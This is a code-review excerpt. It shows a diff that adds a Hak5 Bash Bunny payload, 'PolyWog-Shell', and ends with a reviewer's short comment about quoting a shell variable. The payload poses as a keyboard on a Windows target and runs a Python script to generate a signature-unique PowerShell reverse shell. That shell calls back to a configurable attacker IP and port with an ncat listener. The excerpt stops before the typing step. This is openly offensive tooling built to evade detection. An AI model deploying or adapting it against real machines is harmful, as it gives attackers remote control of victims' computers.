payloads/library/execution/PolyWog-Shell/payload.txt

```diff
@@ -0,0 +1,51 @@
+####################
+# Title: PolyWog-Shell
+# Author: Hak5Peaks
+# Catagory: Exacuation
+# Description: This payload uses a python2 + Bash script to generate a signature unique powershell rev shell that is typed out on the target PC.  
+# Target: Windows
+####################
+
+# PLEASE READ THE CONFIGUATION REQUIRMENTS INSIDE THE GITHUB REPO BEFORE RUNNING SCRIPT. 
+
+ATTACKMODE HID
+LED B # indicate payload started
+
+Q DELAY 1000 #Waiting for PC to recongize bunny. 
+
+#rev shell call back configuation options. 
+IP="192.168.0.0" #Change this to IP on ncat listen
+PORT="0"  #Change this to Port on ncat listen
+SHELL_PY_DIR="" # Placeholder for locating shell.py | NO NEED TO CONFIGURE | 
+
+
+# Check for shell.py in Udisk and root dir, just incase the script is ran twice. 
+if [ -f "/tools/shell.py" ]; then 
+    SHELL_PY_DIR="/tools"
+elif [ -f "/root/udisk/tools/shell.py" ]; then
+    SHELL_PY_DIR="/root/udisk/tools"
+else
+    Q DELAY 1000
+    Q GUI
+    Q DELAY 500
+    Q STRING "shell.py not found, make sure you have placed it inside of the UDisk :) " >&2 #Catch to make sure the user has shell.py on their bunny.
+    LED R # indicate payload failed.
+    exit 1
+fi
+
+cd ..
+cd $SHELL_PY_DIR
+python shell.py $IP $PORT #pass IP and port as arg in python generator script.
+SHELL=$(cat shell.txt) # set output as global variable to avoid having to add escapes. 
```

Comment:
this should probably be quoted for safety(?)

or maybe I just write paranoid bash

```SHELL="$(cat shell.txt)"```